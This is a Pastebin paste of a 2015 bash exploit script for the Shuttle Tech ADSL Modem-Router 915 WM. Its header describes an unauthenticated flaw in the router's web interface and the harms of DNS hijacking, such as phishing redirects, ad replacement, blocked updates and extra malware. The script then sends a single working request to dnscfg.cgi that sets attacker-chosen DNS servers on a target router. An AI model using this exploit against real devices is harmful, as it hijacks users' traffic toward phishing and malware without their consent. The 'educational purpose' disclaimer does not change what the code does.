Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- # Shuttle Tech ADSL Modem-Router 915 WM
- # Unauthenticated Remote DNS Change Exploit
- #
- # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- # Description:
- # The vulnerability exist in the web interface, which is
- # accessible without authentication.
- #
- # Once modified, systems use foreign DNS servers, which are
- # usually set up by cybercriminals. Users with vulnerable
- # systems or devices who try to access certain sites are
- # instead redirected to possibly malicious sites.
- #
- # Modifying systems' DNS settings allows cybercriminals to
- # perform malicious activities like:
- #
- # o Steering unknowing users to bad sites:
- # These sites can be phishing pages that
- # spoof well-known sites in order to
- # trick users into handing out sensitive
- # information.
- #
- # o Replacing ads on legitimate sites:
- # Visiting certain sites can serve users
- # with infected systems a different set
- # of ads from those whose systems are
- # not infected.
- #
- # o Controlling and redirecting network traffic:
- # Users of infected systems may not be granted
- # access to download important OS and software
- # updates from vendors like Microsoft and from
- # their respective security vendors.
- #
- # o Pushing additional malware:
- # Infected systems are more prone to other
- # malware infections (e.g., FAKEAV infection).
- #
- # Warning:
- # My first public report on such a serious
- # vulnerability was ignored by the manufacturers
- # and were committed serious criminal deeds of
- # cybercriminals in Brasil. This vulnerability
- # could affect millions of users worldwide.
- # http://www.exploit-db.com/exploits/16275/
- # http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
- #
- # Disclaimer:
- # This or previous programs is for Educational
- # purpose ONLY. Do not use it without permission.
- # The usual disclaimer applies, especially the
- # fact that Todor Donev is not liable for any
- # damages caused by direct or indirect use of the
- # information or functionality provided by these
- # programs. The author or any Internet provider
- # bears NO responsibility for content or misuse
- # of these programs or any derivatives thereof.
- # By using these programs you accept the fact
- # that any damage (dataloss, system crash,
- # system compromise, etc.) caused by the use
- # of these programs is not Todor Donev's
- # responsibility.
- #
- # Use them at your own risk!
- #
- #
- if [[ $# -gt 3 || $# -lt 2 ]]; then
- echo " Shuttle Tech ADSL Modem-Router 915 WM"
- echo " Unauthenticated Remote DNS Change Exploit"
- echo " ================================================================"
- echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
- echo " Example: $0 133.7.133.7 8.8.8.8"
- echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
- echo ""
- echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
- echo " http://www.ethical-hacker.org/"
- exit;
- fi
- GET=`which GET 2>/dev/null`
- if [ $? -ne 0 ]; then
- echo " Error : libwww-perl not found =/"
- exit;
- fi
- GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement